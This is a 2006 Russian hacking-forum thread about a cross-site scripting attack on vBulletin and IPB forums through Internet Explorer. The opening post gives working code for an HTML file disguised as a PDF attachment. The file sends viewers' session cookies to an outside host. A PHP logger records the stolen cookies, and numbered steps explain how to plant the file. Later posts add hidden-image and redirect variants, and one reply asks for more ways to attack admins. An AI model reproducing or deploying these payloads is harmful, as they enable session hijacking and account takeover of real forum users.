ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу XSS vbulletin and IPB v2.1.7 With IE
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS vbulletin and IPB v2.1.7 With IE
  #1  
Старый 06.08.2006, 10:42
Аватар для liauliau
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию XSS vbulletin and IPB v2.1.7 With IE
XSS vbulletin and IPB v2.1.7 With IE

test:<html><script> alert("hello");</script></html>

-----------------------------------------------------------------

test.pdf
------

Код:
<html><script>img = new Image(); img.src = "http://blablabla.org/c.php?c="+document.cookie;</script></html>

c.php
-----

Код:
<?php 
 $cookie = $_GET['c']; 
 $ip = getenv ('REMOTE_ADDR'); 
 $date=date("m/d/Y g:i:s a"); 
 $referer= getenv ('HTTP_REFERER'); 
 $fl = fopen('log.txt', 'a'); 
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n"); 
 fclose($fl); 
?>
1_ Пишут test.pdf и c.php
2_ Помещенный c.php на webserver.
3_ Изменяют(Заменяют) url в test.pdf.
4_ Делают пост с test.pdf как attachement.
5_, когда кто - то будет смотреть на ваш attachement, Вы получите его печенье в log.txt

Лог сниффера

Код:
<html>
<script>img = new Image(); img.src ="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</html>
Последний раз редактировалось liauliau; 06.08.2006 в 10:48..
 
Ответить с цитированием

  #2  
Старый 06.08.2006, 11:31
Аватар для liauliau
liauliau
Новичок
Регистрация: 09.04.2005
Сообщений: 29
Провел на форуме:
438995

Репутация: 17
По умолчанию
ребята как заставить его работать ?

Код:
<html>
<script> 
document.write('<img src="http://blablabla.org/c.php?c='+document.cookie+'" WIDTH=0 HEIGHT=0>'); 
document.location.href="https://www.google.com/adsense/testmagic.pdf"; 
</script>
</html>
или

Код:
<html>
<script> 
document.write('<img src="http://antichat.ru/cgi-bin/s.jpg?'+document.cookie+'" WIDTH=0 HEIGHT=0>'); 
document.location.href="https://www.google.com/adsense/testmagic.pdf"; 
</script>
</html>
 
Ответить с цитированием

  #3  
Старый 06.08.2006, 12:10
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию
Дык.. не обязательно pdf. Ещё можно точно такую же шнягу провести и с .html -) В IPB по крайне мере иногда разрешен данный вид атача.
 
Ответить с цитированием

  #4  
Старый 10.08.2006, 19:21
Аватар для MeXoN
MeXoN
Новичок
Регистрация: 24.07.2006
Сообщений: 13
Провел на форуме:
84362

Репутация: 1
По умолчанию
Код не работает.=(
 
Ответить с цитированием

  #5  
Старый 10.08.2006, 21:14
Аватар для em00s7
em00s7
Участник форума
Регистрация: 02.05.2006
Сообщений: 193
Провел на форуме:
530613

Репутация: 25
Отправить сообщение для em00s7 с помощью ICQ
По умолчанию
MeXoN в каком браузере проверял?
 
Ответить с цитированием

  #6  
Старый 16.08.2006, 15:18
Аватар для MeXoN
MeXoN
Новичок
Регистрация: 24.07.2006
Сообщений: 13
Провел на форуме:
84362

Репутация: 1
По умолчанию
Во всех!!
 
Ответить с цитированием

  #7  
Старый 16.08.2006, 15:19
Аватар для MeXoN
MeXoN
Новичок
Регистрация: 24.07.2006
Сообщений: 13
Провел на форуме:
84362

Репутация: 1
По умолчанию
Мошь есть какие нить еще способы нае.... Админов=)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ